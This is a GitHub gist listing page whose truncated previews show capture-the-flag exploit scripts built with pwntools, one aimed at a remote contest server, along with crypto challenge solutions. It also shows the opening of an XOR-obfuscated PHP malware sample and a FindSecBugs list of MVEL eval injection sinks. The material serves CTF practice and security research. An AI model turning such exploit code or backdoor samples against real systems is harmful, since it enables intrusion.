Skip to content

Instantly share code, notes, and snippets.

View HoLyVieR's full-sized avatar

Olivier Arteau HoLyVieR

183 followers · 10 following
  • Montreal, QC, Canada
View GitHub Profile
@HoLyVieR
HoLyVieR / gist:6704a7123116f82275b0
Created February 21, 2016 03:53
Hitcon
from pwn import *
from sys import *
import struct
offset_tab = 0x602140
r = process("./a679df07a8f3a8d590febad45336d031-stkof")
def add_node(size):
r.sendline("1")
r.sendline(str(size))
@HoLyVieR
HoLyVieR / gist:69aa3d42077f17ffa7a8
Last active February 29, 2016 22:33
PHP Crap Malware.php
<?php
$kh="0123";
$kf="26d5";
function xor($t,$k){
$c=strlen($k);
$l=strlen($t);
$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++){
@HoLyVieR
HoLyVieR / hmac-crc.py
Last active December 24, 2019 07:23
HMAC-CRC Solution
#!/usr/bin/env python
"""
Utility fonction to convert from one form to an other
"""
def to_bits(length, N):
return [int(i) for i in bin(N)[2:].zfill(length)]
def from_bits(N):
return int("".join(str(i) for i in N), 2)
@HoLyVieR
HoLyVieR / md5.py
Created March 20, 2016 19:40
#!/usr/bin/python
#
# Derived from:
#
# MD5C.C - RSA Data Security, Inc., MD5 message-digest algorithm
#
# Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
# rights reserved.
#
# License to copy and use this software is granted provided that it
@HoLyVieR
HoLyVieR / parlor.py
Created March 22, 2016 00:53
from pwn import *
import struct
import md5
r = remote('127.0.0.1', 4321)
print(r.recvuntil("quit\n====================\n"))
r.sendline("1")
print(r.recvuntil("Please pick odds (as a power of 2 between 1 and 112): "))
@HoLyVieR
HoLyVieR / challenge2.py
Created March 22, 2016 00:56
from pwn import *
import struct
import md5
r = remote('127.0.0.1', 4322)
h = "c237457a8badc2f92b66ace8dc6669e5".decode("hex")
state = list(struct.unpack("<4I", h))
#md5.md5_compress(state, final_block)
@HoLyVieR
HoLyVieR / sponge.py
Created February 27, 2017 17:19
from Crypto.Cipher import AES
from SocketServer import ThreadingMixIn
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import sys
import random
import os
class Hasher:
def __init__(self):
self.aes = AES.new('\x00'*16)
@HoLyVieR
HoLyVieR / solve_toxic_maze.py
Created March 29, 2017 02:41
import Queue as queue
WORLD_SIZE = 25
world = open("grid1.txt").read().replace("S","-1").replace("E","-1").split("\n")[:WORLD_SIZE]
map_state = []
for i in range(WORLD_SIZE):
world[i] = world[i].split(",")
world[i] = map(int, world[i])
@HoLyVieR
HoLyVieR / gist:25e350b03899b4bf7407ecc69841bc43
Created June 16, 2017 20:59
FindSecBug signature MVEL
org/mvel2/MVEL.eval(Ljava/lang/String;)Ljava/lang/Object;:0
org/mvel2/MVEL.eval(Ljava/lang/String;Ljava/lang/Object;)Ljava/lang/Object;:0
org/mvel2/MVEL.eval(Ljava/lang/String;Lorg.mvel2.integration.VariableResolverFactory;)Ljava/lang/Object;:0
org/mvel2/MVEL.eval(Ljava/lang/String;Ljava/lang/Object;Lorg.mvel2.integration.VariableResolverFactory;)Ljava/lang/Object;:0
org/mvel2/MVEL.eval(Ljava/lang/String;Ljava.util.Map;)Ljava/lang/Object;:0
org/mvel2/MVEL.eval(Ljava/lang/String;Ljava/lang/Object;Ljava.util.Map;)Ljava/lang/Object;:0
org/mvel2/MVEL.eval(Ljava/lang/String;Lorg/mvel2/Class;)Lorg/mvel2/T;:0
org/mvel2/MVEL.eval(Ljava/lang/String;Ljava/lang/Object;Lorg/mvel2/Class;)Lorg/mvel2/T;:0
org/mvel2/MVEL.eval(Ljava/lang/String;Lorg.mvel2.integration.VariableResolverFactory;Lorg/mvel2/Class;)Lorg/mvel2/T;:0
org/mvel2/MVEL.eval(Ljava/lang/String;Ljava.util.Map;Lorg/mvel2/Class;)Lorg/mvel2/T;:0
@HoLyVieR
HoLyVieR / exploit.py
Created June 20, 2017 17:24
from pwn import *
#r = process("./beatmeonthedl")
r = remote('sploitbox.com', 10001)
r.recvuntil("Enter username: ")
r.sendline("mcfly")
r.recvuntil("Enter Pass: ")
r.sendline("awesnap")